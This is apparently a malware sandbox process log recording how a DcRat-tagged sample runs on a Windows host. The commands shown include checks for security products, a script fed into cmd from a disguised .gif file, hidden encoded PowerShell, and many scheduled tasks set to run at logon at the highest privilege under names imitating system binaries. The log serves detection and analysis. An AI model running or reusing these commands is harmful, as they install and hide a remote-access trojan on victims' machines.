-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4972 -ip 49721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4972 -ip 49721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4972 -ip 49721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4972 -ip 49721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4972 -ip 49721⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5240 -ip 52401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5272 -ip 52721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5224 -ip 52241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5272 -ip 52721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5620 -ip 56201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5224 -s 4601⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif1⤵
-
C:\Windows\SysWOW64\cmd.execmd2⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq BullGuardCore.exe"3⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "bullguardcore.exe"3⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"3⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"3⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif3⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pifAccostarmi.exe.pif N3⤵
-
C:\Windows\SysWOW64\waitfor.exewaitfor /t 5 jFjyKdbHiNcpqGHLaDXhhIXfDT3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 3112 -ip 31121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4940 -ip 49401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4940 -ip 49401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5272 -s 4681⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5240 -ip 52401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5224 -s 4681⤵
- Program crash
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "identity_helper" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\telclient\identity_helper.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5224 -ip 52241⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\wscinterop\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3112 -ip 31121⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Public\Libraries\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 5620 -ip 5620
-
C:\Windows\system32\schtasks.exe /create /tn "8yPhCVbCi1c8XIP1eciLPkHT" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Java\Java Update\8yPhCVbCi1c8XIP1eciLPkHT.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Temp\smss.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe /create /tn "gtGhkMGggyQ8QkD_Z3jVqai0" /sc ONLOGON /tr "'C:\odt\gtGhkMGggyQ8QkD_Z3jVqai0.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\msedge.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exe /create /tn "gtGhkMGggyQ8QkD_Z3jVqai0" /sc ONLOGON /tr "'C:\Users\Admin\Documents\8yPhCVbCi1c8XIP1eciLPkHT\gtGhkMGggyQ8QkD_Z3jVqai0.exe'" /rl HIGHEST /f
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\wrbbsad
-
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5620 -ip 5620
-
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5620 -ip 5620
-
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5620 -ip 5620
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
-
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5620 -ip 5620
-
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5620 -ip 5620
-
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5620 -ip 5620
-
C:\Windows\system32\WerFault.exe -pss -s 632 -p 1372 -ip 1372
-
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4972 -ip 4972
-
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4972 -ip 4972
-
C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\PyYIOdR.exe j6 /site_id 525403 /S
-
C:\Windows\system32\WerFault.exe -pss -s 584 -p 5196 -ip 5196